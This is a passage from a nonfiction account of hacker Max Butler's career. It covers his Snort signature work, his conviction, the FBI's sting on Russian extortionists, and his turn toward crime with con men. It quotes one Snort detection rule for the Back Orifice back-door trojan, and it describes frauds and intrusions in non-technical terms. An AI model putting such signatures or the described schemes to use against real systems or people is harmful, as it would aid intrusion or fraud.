Bugtraq. But +Bugtraq didn’t censor, and it was common for a bug finder +to drop a previously unknown exploit onto the list, releasing +it simultaneously to thousands of security researchers and +hackers in the span of minutes. The maneuver was all but +guaranteed to kick a software company into rapid +response. +Bugtraq provided hackers with a way to show off their +expertise without breaking the law. The ones who were still +cracking systems had an invigorated white-hat community +to deal with, armed with a growing arsenal of defensive +tools. +In late 1998, a former NSA cybersecurity contractor +named Marty Roesch developed one of the best. Roesch +thought it would be fun to see what random attacks were +crossing his home cable modem connection while he was +at work. As a weekend project, he cranked out a packet +sniffer called Snort and released it as an open-source +project. +At first, Snort was nothing special—a packet sniffer is a +common security tool that eavesdrops on the traffic +crossing a network and dumps it to a file for analysis. But a +month later, Roesch turned his program into a full-blown +intrusion detection system (IDS), which would alert the +operator whenever it spotted network traffic that matched +the signature of a known attack. There were a number of +proprietary IDSs on the market, but Snort’s versatility and +open-source licensing instantly appealed to the white hats, +who loved nothing more than tinkering with a new security + +who loved nothing more than tinkering with a new security +tool. Volunteer programmers jumped in to add functionality +to the program. +Max was excited by Snort. The software was similar to +BRO, the Lawrence Berkeley lab project that had helped +sniff out Max’s BIND attack, and Max knew it could be a +game changer for online security. Now white hats could +watch in real time for anyone trying to exploit the +vulnerabilities discussed on Bugtraq and elsewhere. Snort +was like an early-warning system for a network—the +computer equivalent of the NORAD radar mesh that +monitors America’s airspace. All it was lacking was a +comprehensive and up-to-date list of attack signatures, so +the software would know what to look for. +In the first few months after Snort’s release, a +disorganized trickle of user-created signatures put the total +number at about 200. In a single sleepless night, Max more +than doubled the count, whipping up 490 signatures. Some +were original, others were improved versions of the existing +rules or ports from Dragon IDS, a popular proprietary +system. Writing a rule meant identifying unique +characteristics in the network traffic produced by a +particular attack, like the port number or a string of bytes. +For instance, the incantation alert udp any any -> $INTERNAL +31337 (msg:“BackOrifice1-scan”; content:“|ce63 d1d2 16e7 13cf 38a5 +a586|”;) detected black hats trying to use the Cult of the +Dead Cow’s Back Orifice malware that had so transfixed +the crowd at Def Con 6.0. It told Snort that an incoming +connection to port 31337, with a particular string of twelve +bytes in the network traffic, was someone trying to exploit +the back door. +Max put the signatures online as a single file on +Whitehats.com, crediting a handful of other security geeks +for their contributions, including Ghost23—a nod to his alter +ego. Later, he converted the file to a full-fledged database +and invited other experts to contribute their own rules. He +gave the project the catchy name arachNIDS, for Advanced +Reference Archive of Current Heuristics for Network + +Intrusion Detection Systems. +ArachNIDS was a hit and helped Snort surge to new +levels of popularity in the security community, with Max +Vision riding the swell to security stardom. As more white +hats contributed to the project, it became the computer- +security equivalent of the FBI’s fingerprint database, +capable of identifying virtually every known attack technique +and variant. Max built on his success by writing papers +dissecting Internet worms with the same clear eye he’d +applied to the ADM worm. The technology press started +seeking him out for comment on the latest attacks. +In 1999, Max injected himself into another promising +venture aimed directly at tricking black-hat hackers. The +Honeynet Project, as it would later be called, was the work +of a former Army officer who applied his interest in military +tactics to erect network “honeypots”—decoy computers that +served no purpose but to be hacked. The Honeynet Project +would secretly wire a packet sniffer to the system and place +it unprotected on the Internet, like an undercover vice cop +decked out in pumps and a short skirt on a street corner. +When a hacker targeted a honeypot, his every move +would be recorded and then analyzed by security experts, +with the results released to the world in the spirit of full +disclosure. Max delved into the forensic work, +reconstructing crimes from raw packet data and producing +cogent analyses that blew the lid off some of the +underground’s concealed techniques. +But Max knew his rising recognition as a white hat +wouldn’t save him from the federal grand jury. In quiet +moments, he fantasized with Kimi about escaping his fate. +They could run off together, to Italy or some remote island. +They’d start over. He’d find a benefactor, someone with +money who recognized Max’s talent and would pay him to +hack. +The couple’s relationship was suffering under the weight +of the government’s silent looming presence in their life. + +Before the raid, they hadn’t much planned for the future. +Now they couldn’t. The future had been taken out of their +control, and the uncertainty was toxic. They fought in private +and snipped at each other in public. “The reason I signed +the confession is because we’d just gotten married, and I +didn’t want to hurt you,” Max said. He blamed himself, he +added. By getting married, he’d given his enemies a +weapon to use against him, a fatal flaw. +Kimi transferred from De Anza, a community college, to +UC Berkeley, and the couple moved across the bay to live +just off campus. The move proved fortuitous for Max. In the +spring of 2000, a Berkeley company named Hiverworld +offered him a long-awaited shot at the dot-com success +that had already graced other Hungry Programmers. The +company’s plan was to create a new antihacking system +that would detect intrusions, like Snort, but also actively +scan the user’s network for vulnerabilities, allowing it to +ignore malicious volleys that had no chance of success. +Snort author Marty Roesch was employee number 11. Now +the company wanted Max Vision as number 21. +Max’s first day was set for March 21. It was an early +position at a promising technology start-up. The American +dream, circa 2000. +On the morning of March 21, 2000, the FBI knocked on +Max’s door. +At first he thought it was a Hiverworld hazing, a practical +joke. It wasn’t. “Just don’t answer it!” he said to Kimi. He +grabbed a phone and found a hiding place, in case the +agents peered through the windows. He dialed Granick and +told her what was happening. The indictment must have +finally come down. The FBI was there to take him to jail. +What should he do? +The agents left—their arrest warrant didn’t authorize +them to crash into Max’s home, so he’d temporarily +thwarted them by the simple act of not answering the door. + +On her end, Granick called the prosecutor to try to arrange +for a civilized self-surrender at the FBI field office in +Oakland. Max contacted Hiverworld’s CTO, his new boss, +to report that he wouldn’t be showing up for his first day at +work. He’d be in touch in a day or two to explain everything, +he said. +The evening news beat him to the punch: Alleged +computer hacker Max Butler had just turned himself in on a +fifteen-count indictment charging illegal interception of +communications, computer intrusion, and possession of +stolen passwords. +After two nights in jail, Max was brought in front of a +federal magistrate in San Jose for arraignment. Kimi, Tim +Spencer, and a dozen Hungry Programmers filled the +gallery. Max was released on a $100,000 bond—Tim +signed for half, and a fellow Hungry who’d struck it rich at a +dot-com put down the remainder in cash. +The arrest sent shock waves through the computer +security world. Hiverworld canceled its job offer on the spot +—no security start-up could hire a man facing current +computer intrusion charges. The community fretted over +what would happen to the arachNIDS database without +Max’s curatorship. “It’s his stuff,” Roesch ruled in a post on +a security mailing list. “So barring him explicitly ceding it to +someone, it’s still his to maintain.” +Max responded personally in a long message sweeping +through his early love of computers and the future direction +of intrusion detection. Whitehats.com and arachNIDS would +continue no matter what, he predicted. “My family and +friends have been incredibly supportive and there are offers +to maintain the sites to a certain degree should tragedy +occur.” +Casting himself as a victim, he railed against the “frenzy +of the hacker witch-hunt” and slammed Hiverworld for +disloyalty. “After the smoke cleared and I was in the press, +Hiverworld decided not to continue our relationship,” he +wrote. “The corporation expressed cowardice that is + +wrote. “The corporation expressed cowardice that is +deplorable. I can’t tell you how disappointed I was to feel +the complete lack of support from the Hive. +“I am innocent until proven guilty,” he wrote. “And would +appreciate the recognition of this by our community.” +Six months later, Max pleaded guilty. The news was +nearly lost amid a flurry of federal hacker prosecutions. The +same month, Patrick “MostHateD” Gregory, the leader of a +hacker gang called globalHell, was sentenced to twenty-six +months in prison and ordered to pay $154,529.86 in +restitution for a string of website defacements. At the same +time, prosecutors charged twenty-year-old Jason “Shadow +Knight” Diekman of California with cracking NASA and +university systems for fun, and sixteen-year-old Jonathan +James, known as “C0mrade,” received a six-month +sentence for his recreational intrusions into Pentagon and +NASA computers—the first term of confinement ever +handed down in a juvenile hacking case. +To all appearances, federal law enforcement now had +firm control of the computer intrusions that had for so long +struck fear into corporate America and government +officials. In truth, all these victories were battles in +yesterday’s cyberwar against bedroom hackers, a dying +breed. Even as Max copped his plea in a San Jose +courtroom, the FBI was discovering a twenty-first-century +threat gathering five thousand miles away—one intimately +entwined with Max Vision’s future. + +8 + +Welcome to America +he two Russians made themselves at home in the +small office in Seattle. Alexey Ivanov, twenty, typed on a +computer keyboard while his associate, nineteen-year-old +Vasiliy Gorshkov, stood by and watched. They were +straight off a flight from Russia and already knee-deep into +the biggest job interview of their lives—negotiating for a +lucrative international partnership with the U.S. computer- +security start-up Invita. +Office workers milled around them, and tinny pop music +spilled from the computer’s speaker. After a few minutes, +Gorshkov drifted off to another computer across the room, +and Michael Patterson, Invita’s CEO, struck up a +conversation. +It had been Patterson who’d invited the Russians to +Seattle. Invita, he’d told them in an e-mail, was a young +company, but it was gaining customers through contacts +the founders had made while working at Microsoft and Sun. +Now the company wanted help expanding into Eastern +Europe. Ivanov, who claimed to have as many as twenty +talented programmers working with him, seemed perfect +for the job; Gorshkov was a tag-along, invited by Ivanov to +act as the duo’s spokesman. He had a fiancée waiting +back home, pregnant with his first child. +Patterson began casually asking Gorshkov about a +recent rash of computer intrusions into U.S. companies, +some of whom paid money to the attackers to make them +stop. “Just so I know you guys are as good as I think you +are,” Patterson said, “could any of that have been you +guys?” + +Gorshkov—bundled in the heavy jacket he wore back +home in Chelyabinsk, a bleak, polluted industrial city in the +Ural Mountains—hedged for a minute and finally answered. +“A few months ago we tried, but we found it’s not so +profitable.” +The Russian was being modest. For nearly a year, small +to midsized Internet companies around the United States +had been plagued by extortionate cyberattacks from a +group calling itself the Expert Group of Protection Against +Hackers—a name that probably sounds better in Russian. +The crimes always unfolded the same way: Attackers from +Russia or Ukraine breached the victim’s network, stole +credit card numbers or other data, then sent an e-mail or a +fax to the company demanding payment to keep quiet +about the intrusion and to fix the security holes the hackers +exploited. If the company didn’t pay up, the Expert Group +would threaten to destroy the victim’s systems. +The gang had lifted tens of thousands of credit card +numbers from the Online Information Bureau, a financial +transaction clearinghouse in Vernon, Connecticut. The +Seattle ISP Speakeasy had been hit. Sterling +Microsystems in Anaheim, California, had been hacked, +along with a Cincinnati ISP, a Korean bank in Los Angeles, +a financial services company in New Jersey, the electronic +payment company E-Money in New York, and even the +venerable Western Union, which had lost nearly sixteen +thousand customer credit card numbers in an attack that +came with a $50,000 extortion threat. When music-seller +CD Universe didn’t give in to a $100,000 ransom demand, +thousands of its customers’ credit card numbers showed +up on a public website. +Several companies wound up paying the Expert Group +small amounts to go away, while the FBI did its best to +track the intrusions. They finally zeroed in on one of the +ringleaders, “subbsta,” whose real name was Alexey +Ivanov. It wasn’t that hard—the hacker, convinced he was +out of reach of American justice, had given his résumé to + +out of reach of American justice, had given his résumé to +Speakeasy during the extortion negotiations there. +Russian police had ignored a diplomatic request to +detain and question Ivanov, and that was when the feds +created Invita, a full-blown undercover business designed +to lure the hacker into a trap. Now Ivanov and Gorshkov +were surrounded by undercover FBI agents posing as +company employees, along with a white-hat hacker from +the nearby University of Washington who was playing the +role of a computer geek named Ray. Hidden cameras and +microphones recorded everything in the office, and FBI- +installed spyware captured every keystroke typed on the +computers. In the parking lot outside, around twenty FBI +agents were standing by to help with the arrest. +The agent playing CEO Patterson tried to draw Gorshkov +out some more. “What about credit cards? Credit card +numbers? Anything like that?” +“When we’re here, we’ll never say that we got access to +credit card numbers,” the hacker replied. +The FBI agent and Gorshkov laughed conspiratorially. “I +understand. I hear ya, I hear ya,” said Patterson. +When the two-hour meeting concluded, Patterson +ushered the men into a car, ostensibly to take them to the +temporary housing arranged for their visit. After a short +drive, the car stopped. Agents threw open the doors and +arrested the Russians. +Back at the office, an FBI agent realized the keystroke +logger installed on the bureau computers at Invita +presented him with a rare opportunity. What he did next +would make him the first FBI agent to be accused by the +Russian federal police of committing a computer crime. He +went into the keystroke logs and retrieved the password the +pair had used to access their computer in Chelyabinsk. +Then, after checking with his supervisor and a federal +prosecutor, he logged in to the hackers’ Russian server +over the Internet and started scrounging through the +directory names, looking for the files belonging to Ivanov + +and Gorshkov. +When he found them, he downloaded 2.3 gigabytes of +compressed data and burned it onto CD-ROMs, only later +obtaining a warrant from a federal judge to search through +the information he’d grabbed. It was the first international +evidence seizure through hacking. +When the feds dug into the data, the breathtaking scope +of Ivanov’s activity became clear. In addition to the extortion +plots, Ivanov had developed a frighteningly effective method +for cashing out the cards he stole, using custom software to +automatically open PayPal and eBay accounts and bid on +auctioned goods with one of the half-million stolen credit +cards in his collection. When the program won an auction, it +had the goods shipped to Eastern Europe, where an +associate of Ivanov picked them up. Then the software did +it all again and again. PayPal checked the stolen credit +card list against its internal databases and found it had +absorbed a stunning $800,000 in fraudulent charges. +It was the first tremor in a tectonic shift that would +fundamentally change the Internet for the next decade. +Maybe forever. With top-flight technical colleges but few +legitimate opportunities for their graduates, Russia and the +former Soviet satellite states were incubating a new breed +of hacker. +Some, like Ivanov, were amassing personal fortunes by +looting consumers and companies, protected by corrupt or +lazy law enforcement in their home countries and poor +international cooperation. Others, like Gorshkov, were +driven into crime by tough economic circumstances. The +hacker graduated from Chelyabinsk State Technical +University with a degree in mechanical engineering and +sank a small inheritance from his father into a computer- +hosting and Web-design business. Despite his swaggering +hacker machismo at Invita, Gorshkov had been a late +addition to Ivanov’s gang, and he’d paid his own way to +America in the hope of improving his fortunes. In a way, he +did: After his arrest in Seattle, he was earning more in + +did: After his arrest in Seattle, he was earning more in +prison doing janitorial and kitchen work at eleven cents an +hour than his fiancée was drawing on public assistance +back home. +After his arrest, Ivanov began cooperating with the FBI, +rattling off a list of friends and accomplices still hacking +back home. The bureau realized there were dozens of +profit-oriented intruders and fraud artists from Eastern +Europe already reaching their tentacles into Western +computers. +In the years to come, the number would grow to +thousands. Ivanov and Gorshkov were Magellan and +Columbus: Their arrival in America instantly redrew the +global cybercrime map for the FBI and placed Eastern +Europe indisputably at its center. + +9 + +Opportunities +ax wore a blazer and rumpled cargo pants to his +sentencing hearing and watched silently as the lawyers +sparred over his fate. +Jennifer Granick, the defense attorney, told Judge James +Ware that Max deserved a lowered sentence for his service +as the Equalizer. The prosecutor took the opposite +position. Max, he argued, had pretended to be an FBI +informant while secretly committing crimes against the U.S. +government. It was worse than if he had never cooperated +at all. +It was a strange sentencing hearing for a computer +criminal. A dozen of Max’s colleagues in the security world +—people devoted to thwarting hackers—had written to +Judge Ware on Max’s behalf. Dragos Ruiu, a prominent +security evangelist in Canada, called Max “a brilliant +innovator in this field.” French programmer Renaud +Deraison credited Max’s early support with making +possible Nessus, Deraison’s vulnerability scanner and one +of the most important free security tools then available. +“Given Max’s potential and his clear vision of Internet +security … it would be more useful for society as a whole +that he stays among us as a computer security +specialist … rather than spend time in a cell and see his +computing talent go through a slow but sure decay.” +From a technology worker in New Zealand: “Without the +work that Max has done … it would be so much harder for +my company and countless others to protect themselves +from hackers.” From a fan in Silicon Valley: “Taking Max +out of the security community would greatly hurt our ability to + +protect ourselves.” A former Defense Department worker +wrote, “To imprison this individual would be a travesty.” +Several of the Hungries wrote letters as well, as did +Max’s mother and sister. In her note, Kimi pleaded +eloquently for Max’s freedom. “He saved my life by helping +me out of an abusive relationship and teaching me the +meaning of self-respect,” she wrote. “He gave me shelter +when I had no place to live. He took very good care of me +when I was seriously ill, saving my life again by taking me to +the emergency room when I protested that I was ‘fine’ even +as I was dying.” +When the lawyers finished their arguments, Max spoke +for himself, with the earnest politeness he always exhibited +away from his computer. His attack, he explained, had +been born of good intentions. He’d just wanted to close the +BIND hole and had lost his head. +“I got swept up,” he said softly. “It’s hard to explain the +feelings of someone who’s gotten caught up in the +computer security field.… I felt at the time that I was in a +race. That if I went in and closed the holes quickly, I could +do it before people with more malicious intentions could +use them. +“What I did was reprehensible,” Max continued. “I’ve hurt +my reputation in the computer security field. I’ve hurt my +family and friends.” +Judge Ware listened attentively but had already made up +his mind. Letting Max off without a prison term would send +the wrong message to other hackers. “There’s a need for +those who would follow your footsteps to know that this can +result in incarceration,” the judge said. +The sentence: eighteen months in prison, followed by +three years of supervised release in which Max wouldn’t be +allowed on the Internet without the permission of his +probation officer. +The prosecutor asked the judge to order Max +immediately taken into custody, but Ware denied the +request and gave the hacker a month to put his affairs in + +request and gave the hacker a month to put his affairs in +order and turn himself in to the U.S. marshals. +• • • +Max and Kimi had moved to Vancouver, near her family, +after his guilty plea. When they returned home, Max wasted +no time arranging for Whitehats.com and arachNIDS to +survive his incarceration. He set up automatic bill payments +for his bandwidth and wrote out a list of items for Kimi to +take care of in his absence. She was in charge of +arachNIDS now, he said, indicating the server squatting on +the floor of their apartment. +The couple adopted two kittens to keep Kimi company +while he was gone, named for the swords from Elric of +Melniboné. The orange boy-cat was Mournblade; the gray +female was Stormbringer. +Max spent his last weekend of freedom in front of his +keyboard, getting arachNIDS ready for Kimi’s stewardship. +When Monday came he turned himself in on schedule. On +June 25, 2001, he was locked in the county jail pending his +shipment to his new home, Taft Federal Prison, a +corporate-run facility owned by Wackenhut, positioned near +a small town in central California. +As far as Max was concerned, it was another injustice, +just like back in Idaho. He’d been sent back to prison not +for his hacking but for refusing to set up Matt Harrigan. He +was being punished for his loyalty, once again a victim of a +capricious justice system. He doubted Judge Ware had +even looked at the details of his case. +Kimi was adrift, alone for the first time since she’d met +Max. For all his talk about staying with her forever, he’d +chosen a course of action that guaranteed their separation. +Two months later, Kimi was talking to him on the phone +from prison when she heard a pop! and the smell of acrid +smoke filled her nostrils. The motherboard on Max’s server +had burst into flames. Max tried to calm her—all she had to +do was replace the motherboard. He could do it in his + +sleep. Max talked her through the process, but Kimi was +realizing she wasn’t cut out for life as the prison wife of a +hacker. +In August, she went to the Burning Man festival in Nevada +to forget her troubles. When she got home, she broke some +bad news to Max over the phone. She’d met someone else. +It was another betrayal. Max took the news with eerie +calm, interrogating her about every detail: What drugs was +she on when she cheated on him? What sexual positions +did they use? He wanted to hear her ask for his forgiveness +—he’d have given it to her in a heartbeat. But that wasn’t +what she was asking for. She wanted a divorce. “I don’t +know if you even think about the future anymore,” she said. +In search of closure, Kimi caught a flight to California and +drove to Taft, where she sat nervously in the waiting room, +her eyes playing over a wall of posters depicting +Wackenhut’s network of hivelike prisons around the +country. When Max was brought in, he took his place +across the stainless steel picnic table in the visiting room +and launched into an appeal. He did think of the future, he +told her, and he’d been making plans in the joint. +“I’ve been talking to some people,” he said, lowering his +voice to a hush. “People I think I could work with.” +Jeffrey James Norminton was at the tail end of a twenty- +seven-month stretch when Max met him in Taft. At thirty- +four, Norminton had the stolid physical presence of a +brawler, thick necked with an oversized forehead and a +Kirk Douglas cleft in his chin. An alcoholic and an +accomplished con man, he was a financial wizard who did +his best work half-sober. He’d start chain-chugging Coors +Lights as soon as he rolled out of bed, and by the end of +the day he’d be useless, but in that sweet spot between the +morning’s sobriety and the blurriness of midafternoon, +Norminton was a master of the high-stakes con—a criminal +rainmaker who could produce seven-figure sums from thin + +air. +Norminton’s latest caper had required little more than a +telephone and a fax machine. The target had been the +Entrust Group, a Pennsylvania investment brokerage +house. On a summer day in 1997, Norminton picked up the +phone and called a vice president at Entrust, adopting the +persona of an investment manager at Highland Federal +Bank, a real bank in Santa Monica, California. +Oozing confidence and charm, the swindler persuaded +Entrust to buy into the bank’s high-yield certificates of +deposit, promising the VP a healthy 6.20 percent return on +a one-year investment. When Entrust eagerly wired +$297,000 to Highland, the cash wound up in the account of +a dummy corporation Norminton’s accomplice had set up +under Entrust’s name. To the bank, the transaction looked +like an investment house moving money from one branch to +another. +The grifters promptly withdrew all but $10,000 of the cash +and then ran the scam again, this time with Norminton’s +partner making the phone call to the same VP and +pretending to be from a different bank, City National, +offering an even higher return. Entrust promptly sent two +more transfers totaling $800,000. +Norminton was undone by his ambition. He sent his +accomplice into City National to pull out $700,000 in a +single cashier’s check. An investigator at the bank got +suspicious and backtracked the incoming wire transfers to +the real Entrust. At the next withdrawal, FBI agents were +waiting. The financial mastermind was now cooling his +heels in Taft. The only silver lining to his incarceration was +that he’d met a talented hacker looking to get back at the +system. +Norminton made it clear that he saw real potential in +Max, and the pair took to walking the yard every day, +swapping war stories and fantasizing about how they might +work together when they hit the streets. With Norminton’s +guidance, Max could easily learn to crack brokerage + +guidance, Max could easily learn to crack brokerage +houses, where they’d tap into overstuffed trading accounts +and drain them into offshore banks. One big haul and they’d +have enough cash for the rest of their lives. +After five months, Norminton and his schemes were sent +home to sunny Orange County, California, while Max +remained at Taft with another year left on his sentence— +long, tedious days of bad food, standing for count, and the +sound of chains and keys. +In August 2002, Max was granted early release to a sixty- +one-bed halfway house in Oakland, where he shared a +room with five other ex-cons. Kimi met with Max to present +him with divorce papers. She was getting serious with the +guy she’d met at Burning Man; it was time, she said, for +Max to let her go. Max refused to sign. +Max’s relative freedom at the halfway house was tenuous +—the facility demanded that he obtain gainful employment +or go back to prison, and telecommuting wasn’t allowed. +He reached out to his old contacts in Silicon Valley and +found his employability had been shattered by his high- +profile hacking conviction and over a year in prison. +Desperate, he borrowed a laptop from one of the Hungry +Programmers and banged out a message to an +employment list watched by the computer security experts +who had once admired him. “I have been showing up at +places that farm out manual labor, 5:30 am, and still haven’t +found any work,” he wrote. “My situation is just ridiculous.” +He offered his services at fire-sale prices. “I am willing to +work for minimum wage for the next few months. Surely +there is some open position at a security company in the +area.… The last half dozen employers I have had paid me +at least $100/hr for my time, now I am only asking for +$6.75.” +A consultant answered the plea, agreeing to let Max work +out of his home office in Fremont, a short BART ride from +the halfway house. He’d pay ten dollars an hour for Max to +help build servers, a throwback to Max’s first job for his + +father as a teen. Tim Spencer loaned Max a bike to pedal +to the train station every day. Max was freed from the +halfway house after two months, and the Hungry +Programmers once again stepped up to provide him with +shelter. He moved into an apartment in San Francisco +shared by Chris Toshok, Seth Alves—a veteran of the +Meridian master-key adventure—and Toshok’s ex-girlfriend +Charity Majors. +Despite the jailhouse fantasies he and Norminton had +hatched, Max was determined to go straight. He resumed +his search for work. But the job offers failed to pour in for +the ex-con. Even the Honeynet Project, to which he’d +donated his expertise just a couple of years earlier, +shunned him. +His lot began improving in other ways: He started dating +his housemate Charity Majors, a fellow Idaho refugee who +designed herself like an avatar from a virtual world, painting +her fingernails like Skittles—each a different color—and +wearing contact lenses that tinted her eyes an impossible +emerald. Money was tight for both of them: Charity worked +as a system administrator for a porn website in Nevada, +earning Silver State wages that were stretched thin in San +Francisco. Max was nearly broke. +One of Max’s former clients in Silicon Valley tried to help +by giving Max a $5,000 contract to perform a penetration +test on the company’s network. The company liked Max +and didn’t really care if he produced a report, but the +hacker took the gig seriously. He bashed at the company’s +firewalls for months, expecting one of the easy victories to +which he’d grown accustomed as a white hat. But he was in +for a surprise. The state of corporate security had improved +while he was in the joint. He couldn’t make a dent in the +network of his only client. His 100 percent success record +was cracking. +“I’ve never failed to get into a system before,” Max told +Charity in disbelief. +“Sweetie, you haven’t touched a computer for years,” she + +“Sweetie, you haven’t touched a computer for years,” she +said. “It’ll take you a little while. Don’t feel like you have to +get in today.” +Max pushed harder, only becoming more frustrated over +his powerlessness. Finally, he tried something new. Instead +of looking for vulnerabilities in the company’s hardened +servers, he targeted some of the employees individually. +These “client side” attacks are what most people +experience of hackers—a spam e-mail arrives in your in- +box, with a link to what purports to be an electronic greeting +card or a funny picture. The download is actually an +executable program, and if you ignore the warning +message on your Windows machine and install the +software, your computer is no longer your own. +In 2003 the dirty secret of these attacks was that even +savvy users who knew better than to install foreign software +could be broadsided. “Browser bloat” was largely to blame. +In the nineties a fierce battle with Netscape for control of the +browser market had driven Microsoft to stuff Internet +Explorer with unnecessary features and functionality. Every +added capability expanded the attack surface of the +browser. More code meant more bugs. +Now Internet Explorer holes were constantly surfacing. +They were usually discovered by one of the good guys first: +Microsoft’s own programmers or a white hat who often, but +not always, warned the company before detailing the hole +on Bugtraq. +But once a hole was public, the race was on. Black hats +worked to exploit the bug by setting up Web pages serving +the attack code and then tricking victims into visiting them. +Just looking at the Web page would yield control of the +victim’s computer, without any outward sign of infection. +Even if the bugs were not made public, the bad guys could +figure them out by reverse-engineering the vulnerability +from Microsoft’s patches. Security experts had been +watching with dismay as the time between a vulnerability’s +announcement and its exploitation by black hats shrank + +from months to days. In the worst-case scenario, the black +hats found a bug first: a “zero day” vulnerability that left the +good guys playing catch-up. +With new Microsoft patches coming out nearly every +week, even vigilant corporations tended to lag in installing +them, and average users often didn’t patch at all. A global +survey of one hundred thousand Internet Explorer users +conducted around the time of Max’s effort found that 45 +percent suffered from unpatched remote access +vulnerabilities; narrowing the field to American users +cooled the number only slightly, to 36 percent. +Max’s attack was effective. After securing access to an +employee’s Windows machine, he hopped on the +company’s network from the inside, grabbed some +trophies, and popped out like the chest-bursting monster in +Alien. +“It was then that I decided to scrap my old model of +penetration testing and include client-centric attack as a +mandatory part of the exercise,” he later wrote a white-hat +colleague. “I’ve been confident about the 100 percent rate +ever since.” +But instead of gratitude, Max’s final report was greeted +with outrage. Using a client-side attack in a penetration test +was almost unseemly; if you were hired to test physical +security at a company’s corporate headquarters, you +wouldn’t necessarily feel free to burglarize an employee’s +home to steal the keys. The client gave him a tongue- +lashing; they’d paid Max to attack their servers, not their +employees. +Max began to wonder if he had a future in computer +security at all. His former friends in the community had all +moved on. Hiverworld, where Max had nearly been +employee 21, revamped its executive team and won $11 +million in venture capital, changing its name to nCircle +Network Security. Marty Roesch left the company to build +on the success of Snort—to which Max had contributed— + +starting a firm of his own called Sourcefire in Maryland. +Both companies were on a path to success, nCircle kicking +off an expansion that would take it to 160 employees in the +years to come and Sourcefire heading to an IPO on the +NASDAQ. +In some alternate universe in which Max had never +hacked the Pentagon, or never used that Verio dialup, or +had simply kept his mouth shut and worn a wire on Matt +Harrigan, the hacker would have been riding one of those +companies to financial success and rewarding, challenging +work. Instead, he could only watch from the sidelines. +He was itinerant, grasping for cash, and flailing for +something to do with his freedom. That was when he +checked his Whitehats.com e-mail in-box and found an +anonymous note from “an old friend from Shaft.” It was the +code phrase Max had worked out with Jeff Norminton. +Max met Jeff Norminton in a room at the St. Francis Hotel, +and they caught up. Norminton hadn’t taken well to +supervised release: His sentencing judge required him to +submit monthly urine samples, so his probation officer +could make sure he hadn’t started drinking again. That was +a problem, since he was drinking again. After he’d refused +two piss tests, the court had ordered him to check into +Impact House, a drug and alcohol rehab center in +Pasadena. He walked away after three weeks and was +now looking to scam enough zeroes to flee to Mexico. +It was time to act on the plans they’d made in prison, +Norminton said. He was ready to bankroll Max in his new +career as a professional hacker. +Max was ready. He’d struggled long enough trying to +make an honest living, and he was tired of being punished. +He knew he was wearing out his welcome at the Hungry +Programmers’ house, even if they’d never complain. His +diet was down to noodles and vegetables. He had no +health insurance and dental problems that would cost + +thousands to fix. +Room service interrupted the conversation to deliver a +hospitality basket. Norminton made a show of carrying the +delivery into the bathroom, turning on the shower, and +closing the door—in case the basket was bugged, he said. +When they were done laughing, Max gave Norminton a +short shopping list of gear he’d need to get started, a high- +performance Alienware laptop, for one. And an antenna. A +big one. +There was just one little hitch. Norminton was broke. +They’d need to bring in someone else for seed money. +Fortunately, Jeff knew just the guy. + +10 + +Chris Aragon +ax met his future friend and criminal partner Chris +Aragon in North Beach, San Francisco’s little Italy, where +seedy strip clubs and fortune tellers coexist with a row of +pleasantly gaudy restaurants serving warm bread and hot +pasta to sidewalk diners. The meeting was set for a coffee +shop near the City Lights bookstore, cradle of the Beat +Generation in the 1950s, and kitty-corner from Vesuvio +Café, a saloon announced by colorful wall murals with wine +bottles and a peace sign. Down the hill the Transamerica +Pyramid stood sentry over the financial district, stabbing +the sky. +Norminton introduced Chris to Max over the muted clatter +of coffee cups and dishes. The two hit it off immediately. +The forty-one-year-old Chris was a student of eastern +spirituality, a vegetarian who practiced meditation to center +his mind. Max, with his hippie values, seemed a kindred +spirit on the road of life. They’d even read some of the +same books. +And like Max, Chris had been arrested more than once. +It had all started in Colorado, when Chris was twenty-one +years old. He was working as a masseuse at a hot springs +resort, earning enough to cover his rent and support a +modest cocaine habit, when he hooked up with a troubled +veteran named Albert See whom he’d met in the joint while +serving a juvenile sentence. See had just escaped from a +minimum-security prison camp and needed money to get +out of the country. +Chris came from a privileged background—his mother, +Marlene Aragon, worked in Hollywood as voice talent, and + +she’d recently enjoyed a run on ABC’s Saturday morning +cartoon Challenge of the Superfriends, voicing Wonder +Woman’s feline nemesis the Cheetah. But he also had +romantic notions of crime and criminals; on the wall of his +condo hung a poster of the cover art from the Waylon +Jennings album Ladies Love Outlaws. He took Albert in, +and the two embarked on a series of bold, and mostly +botched, bank robberies in the resort towns dotting +Colorado. +The first robbery, at the Aspen Savings and Loan, started +off well enough: Chris, wearing a blue and white bandana +over his mouth to conceal his braces, pulled an Army-issue +.45 automatic on the bank manager as he unlocked the +door in the morning. He and Albert forced the manager +inside, where they found a cleaning woman hiding under +one of the desks, phoning the police. They left in a hurry. +The second robbery, at the Pitkin County Bank and Trust, +was over before it even began. Chris’s partner hid in a +Dumpster by the back door, planning to jump out with his +shotgun when the first employees came into work in the +morning. The plan was aborted when Chris, watching from +across the street, saw a garbage truck pull into the alley to +empty the Dumpster. +The third robbery was better planned. On July 22, 1981, +Chris and Albert visited Voit Chevrolet in Rifle and +declared they wanted to test-drive a new Camaro. The +luckless salesman insisted on going with them, and when +they cleared the town limit, Chris steered to the side of the +road, and Albert pulled the salesman from the car at +gunpoint. They tied him up with rope, gagged him, and left +him in a field before peeling away in the silver sports car. +The next day at 4:50 p.m., Chris drove the stolen Camaro +up to the Valley Bank and Trust in Glenwood Springs, +where the town locals parked the cash they earned from a +flourishing tourist industry. Chris himself was a customer +there. He waited outside behind the wheel of the car while + +Albert walked in wearing tinted sunglasses and toting a +leather briefcase. Albert ran out minutes later with $10,000 +in cash and jumped into the Camaro, and Chris sped away. +Chris drove them south out of town on an unpaved road +that snaked through the rocky red hills surrounding +Glenwood Springs, then transferred to a jeep trail where his +girlfriend was waiting with the switch car. Jubilant and +excited, Chris drove past her and spun the Camaro into a +triumphant fishtail, sending a plume of dust twenty feet into +the air. +He was jumping up and down and shouting, “We did it!” +when a police cruiser, drawn by the dust cloud, rolled up on +the robbers. Chris and Albert made a mad dash on foot +over the craggy, tree-dotted terrain. Chris tumbled down a +ridge and landed on a cactus, and the two cops caught up +with them. Chris dropped his shotgun and surrendered. +Chris learned a valuable lesson from his experience: not +that crime didn’t pay, but that guns and getaway cars were +a stupid way to rob a bank. When he made parole in 1986, +after five years in federal prison, he delved into credit card +fraud and enjoyed some modest success. Then he hooked +up with a Mexican drug smuggler he’d met in the joint. Chris +helped with the delivery of two thousand pounds of +marijuana to a twenty-acre ranch near Riverside, California, +only to be busted in a nationwide DEA undercover +operation. He went back to prison in September of 1991. +When he got out in 